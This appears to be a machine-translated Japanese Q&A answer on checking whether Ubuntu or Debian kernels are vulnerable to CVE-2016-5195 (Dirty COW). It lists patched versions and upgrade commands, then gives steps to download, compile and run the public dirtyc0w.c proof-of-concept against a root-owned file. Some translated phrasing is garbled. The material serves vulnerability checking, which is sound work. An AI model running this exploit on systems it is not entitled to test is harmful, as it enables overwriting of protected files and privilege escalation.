uname -rv
を実行できます Linux カーネルのバージョンを確認します。以下のような出力が得られます:
4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016
お使いのバージョンが以下より前の場合、影響を受けます:
-
Ubuntu 16.10 の場合は 4.8.0-26.28
-
Ubuntu 16.04 LTS の場合は 4.4.0-45.66
-
Ubuntu 14.04 LTS の場合は 3.13.0-100.147
-
Ubuntu 12.04 LTS の場合は 3.2.0-113.155
-
3.16.36-1+deb8u2 for Debian 8
-
Debian 7 用の 3.2.82-1
-
4.7.8-1 Debian 不安定版
security-tracker.debian によると、uname -a
を実行する必要があります。 現在のカーネル バージョンを確認してください。
wheezy 3.2.78-1 vulnerable
wheezy (security) 3.2.82-1 fixed
jessie 3.16.36-1+deb8u1 vulnerable
jessie (security) 3.16.36-1+deb8u2 fixed
stretch, sid 4.7.8-1 fixed
この脆弱性は、システムをアップグレードすることにより、debian でパッチが適用されます:
apt-get update
apt-get upgrade
apt-get dist-upgrade
編集
<ブロック引用>オペレーティング システムが CVE-2016-5195 の影響を受けていないことを確認するにはどうすればよいですか?
次のチュートリアルを試すことができます。
エクスプロイトをダウンロードします。
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
root として:foo
を作成します ファイル:
su
echo this is not a test > foo
ユーザーとして:
gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
ファイルを確認してください:
cat foo
脆弱なマシンでは、m00000000000000000
が返されます 出力として。